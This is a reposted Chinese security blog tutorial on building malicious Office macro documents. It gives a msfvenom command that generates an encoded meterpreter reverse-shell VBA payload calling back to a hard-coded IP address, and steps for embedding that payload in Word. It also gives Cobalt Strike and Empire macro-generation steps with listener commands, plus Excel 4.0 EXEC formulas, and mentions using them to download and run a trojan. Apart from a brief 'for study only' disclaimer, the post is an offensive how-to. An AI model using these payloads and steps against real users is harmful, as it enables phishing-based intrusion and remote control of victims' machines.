Office宏病毒几种简单生成方式

admin 2021年12月17日10:52:09安全文章评论324 views1820字阅读2分44秒阅读模式

Office宏病毒几种简单生成方式

一、前言


文章有点水大佬们别喷


二、msfVENOM生成宏



在linux中msfvenom生成vba文件




msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=101.132.43.162 lport=6666 -f vba -o 123.vba


Office宏病毒几种简单生成方式

建一个word或者excel文档,点击视图->宏->查看宏

Office宏病毒几种简单生成方式

输入宏名字选择宏的位置为当前文档的名字点击创建宏

Office宏病毒几种简单生成方式

将msfvenom生成的vba的payload复制到里面保存点击否

Office宏病毒几种简单生成方式

保存为docm或者doc这里我保存doc打开该文件点击启用宏

Office宏病毒几种简单生成方式

metasploit监听带你看就是反弹一个shell

Office宏病毒几种简单生成方式

三、CobaltStrike生成宏
打开cobaltstrike点击攻击->生成后门->MS->Office->Micro

Office宏病毒几种简单生成方式

复制payload到word里面,cobaltstrike反弹shell成功

Office宏病毒几种简单生成方式

四、Empire生成宏
启动empire,选择windows/macro

listeners
uselistener http
set Name test
set Host [url=http://xx.xx.xx.xx:6666][color=#03884]http://xx.xx.xx.xx:6666[/color][/url]
set Port 6666
execute

Office宏病毒几种简单生成方式

usestager windows/macroset Listener testset OutFile /root/1.txtexecute

Office宏病毒几种简单生成方式


五、Excel4.0执行payload
利用excel4.0可以执行恶意代码打开excel插入Excel4.0

Office宏病毒几种简单生成方式

利用exec弹计算机

=EXEC("calc.exe")
=ALERT("Hello, World")
=HALT()

Office宏病毒几种简单生成方式


可以利用这个下载我们的木马执行

Office宏病毒几种简单生成方式

六、后记
该文章仅供学习交流禁止非法传播。

Office宏病毒几种简单生成方式


本文始发于微信公众号(疯猫网络):Office宏病毒几种简单生成方式

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月17日10:52:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Office宏病毒几种简单生成方式 http://cn-sec.com/archives/507670.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: